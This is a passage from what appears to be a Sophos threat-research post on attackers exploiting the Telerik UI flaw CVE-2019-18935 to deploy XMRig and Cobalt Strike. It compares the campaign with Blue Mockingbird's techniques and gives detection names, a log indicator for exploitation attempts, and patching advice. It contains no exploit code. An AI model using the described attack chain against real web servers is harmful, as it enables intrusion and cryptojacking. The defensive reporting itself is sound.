For instance, in the 2020 incidents, XMRig Miner was packaged as a DLL, and used as the primary payload, whereas we saw Cobalt Strike used initially, and XMRig downloaded later in the attack chain via an intermediary binary.<\/p>\n<p>Blue Mockingbird also used a <strong>COR_PROFILER COM<\/strong> hijack for persistence, remote scheduled tasks for lateral movement, and <a href=\"https:\/\/github.com\/ohpe\/juicy-potato\">Juicy Potato<\/a> for privilege escalation (as well as Mimikatz to obtain credentials), whereas these techniques were absent in our investigations.<\/p>\n<p>Interestingly, the Blue Mockingbird C2 mechanism appeared to be experimental in 2020, with the threat actor trying out various tools, including reverse shells in PowerShell and DLL form. So it\u2019s possible that the threat actor we observed is a re-tooled Blue Mockingbird, with a refined infection chain and a (relatively) off-the-shelf C2 mechanism in the form of Cobalt Strike \u2013 or it could be a different threat actor, making their own improvements to the Blue Mockingbird methodology.<\/p>\n<p>Either way, it\u2019s clear that CVE-2019-18935 isn\u2019t going away. As shown in the Google Trends graph below, searches for \u2018CVE-2019-18935\u2019 peaked in late May 2020, around the time it was reported as being actively exploited by Netwalker and Blue Mockingbird. 
Activity then tapered off, leading to a lull between November 2021 and January 2022 \u2013 but there has been a recent uptick since then, which may be correlated with some of the attacks the Sophos MTR team has investigated.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85190\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png\" alt=\"A Google Trends line graph showing searches for CVE-2019-18935\" width=\"842\" height=\"421\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png 1199w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png?resize=300,150 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png?resize=768,384 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/Google-searches-for-CVE.png?resize=1024,512 1024w\" sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/a><\/p>\n<p><em>Figure 7: Google searches for &#8216;CVE-2019-18935&#8217; between December 2019 and June 2022<\/em><\/p>\n<p>Looking at our detections of XMRig Miner (in all attacks) between December 2021 and June 2022 makes for an interesting comparison: fairly low levels of activity until a significant spike in late March 2022, followed by sustained levels of higher activity throughout April and May.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85184\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png\" alt=\"A line graph showing Sophos detections of XMRig Miner\" width=\"835\" height=\"556\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png 2436w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png?resize=300,200 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png?resize=768,511 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png?resize=1024,682 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png?resize=1536,1023 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/xmrig_miner_detections.png?resize=2048,1364 2048w\" sizes=\"auto, (max-width: 835px) 100vw, 835px\" \/><\/a><em>Figure 8: Sophos detections of XMRig Miner between December 2021 and May 2022<\/em><\/p>\n<p>Of course, not all attacks involving XMRig Miner also involve CVE-2019-18935 (and vice versa), and there are all sorts of possible explanations for the fluctuations seen in both graphs. What they do illustrate, however, is that while threat actors\u2019 interests in particular vulnerabilities and tools may vary in the short-term, they often return to tried and tested methodologies.<\/p>\n<h3>Detection and guidance<\/h3>\n<p>Whether or not the threat actor in this case is Blue Mockingbird, there are three key learning points for organizations. The first is basic security hygiene: ensuring that you have robust ransomware and malware protection in place, and applying up-to-date patches to Internet-facing products and components such as Telerik UI. This can be difficult if your web application was developed some time ago, or by, for example, contracted developers. 
To check if you\u2019re vulnerable to CVE-2019-18935, there\u2019s <a href=\"https:\/\/github.com\/ThanHuuTuan\/Telerik_CVE-2019-18935\">a scanner for CVE-2019-18935<\/a>, including a Python script and an Nmap Scripting Engine (NSE) plugin \u2013 although, as always, exercise caution when using third-party scanners and tools.<\/p>\n<p>The second is that even relatively old vulnerabilities can be of significant interest to threat actors; just because a bug has dropped off the infosec news cycle, doesn\u2019t make it less impactful when exploited.<\/p>\n<p>And finally, these incidents demonstrate that threat actors\u2019 TTPs often evolve through gradual, incremental refinement, whether of their own approaches or someone else\u2019s. While brand-new vulnerabilities and novel techniques may grab the headlines \u2013 not without good reason \u2013 a successful infection may be the result of a few tweaks in an established attack chain. Threat actors, like everyone else, usually prefer to keep things simple.<\/p>\n<p>We reached out to Telerik to let them know that this vulnerability is still being exploited in the wild. They replied with advice they previously sent out to their customers in 2020: \u201cFixes were provided to our customers and partners in 2017 and 2019. To protect against this vulnerability, we recommend that you upgrade to R1 2020 (version 2020.1.114) or later. 
If you\u2019re unsure if this impacts you, go to <a href=\"https:\/\/www.telerik.com\/blogs\/blue-mockingbird-vulnerability-telerik-guidance\">this page<\/a>.\u201d Telerik also included links to their articles on <a href=\"https:\/\/docs.telerik.com\/devtools\/aspnet-ajax\/knowledge-base\/asyncupload-unrestricted-file-upload\">CVE-2017-11317<\/a> and <a href=\"https:\/\/docs.telerik.com\/devtools\/aspnet-ajax\/knowledge-base\/common-allows-javascriptserializer-deserialization\">CVE-2019-18935<\/a>.<\/p>\n<p>Sophos endpoint products installed on web servers will detect the downloader <strong>setup192.exe<\/strong> as <strong>Troj\/Miner-AED<\/strong>, and the downloader <strong>tuh25o6n.exe<\/strong> as <strong>Troj\/DwnLd-ADF<\/strong>. The Cobalt Strike DLL will be detected as <strong>Mem\/Meter-G<\/strong>, and the Cobalt Strike payload executed in memory will be detected as <strong>Troj\/PShlSpy-A<\/strong> and <strong>ATK\/Cobalt-CP<\/strong>. XMRig Miner will be detected as a potentially unwanted application (PUA), and the associated configuration file as <strong>Coinminer Config<\/strong>. Additionally, behavioral detections such as <strong>Exec_30a<\/strong> will intercept and prevent the downloading and execution of binaries via PowerShell as observed here. 
Multiple GET requests to <strong>[HOST]\/Telerik.Web.UI.WebResource.axd?type=rau<\/strong> in your web server logs can indicate possible exploitation attempts.<\/p>\n<p>SophosLabs has posted IOCs relating to the samples analyzed in this report on <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/Troj-Miner-AED.csv\">our GitHub repository<\/a>.<\/p>\n<h3>Acknowledgments<\/h3>\n<p>SophosLabs would like to acknowledge the contributions of Gabor Szappanos, Gabe Renfro, John Carlo Adriano, Aaron Sullivan, Chaz Denney, Colby Olinarez, and the rest of the Sophos MTR team to this report.<\/p>\n<\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/06\/15\/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/mockingbird.jpg\"\/><\/p>\n<p><strong>Credit to Author: Matt Wixey| Date: Wed, 15 Jun 2022 11:00:05 +0000<\/strong><\/p>\n<p>Attacker targets bugs in a popular web application graphical interface development 
tool<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[24291,15080,26555,26556,26557,11191,24552,18513,26558,16771,18493],"class_list":["post-19344","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-cobalt-strike","tag-cryptomining","tag-cve-2017-11357","tag-cve-2017-1137","tag-cve-2019-18935","tag-powershell","tag-security-operations","tag-sophoslabs-uncut","tag-telerik","tag-threat-research","tag-xmrig"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19344","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19344"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19344\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19344"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
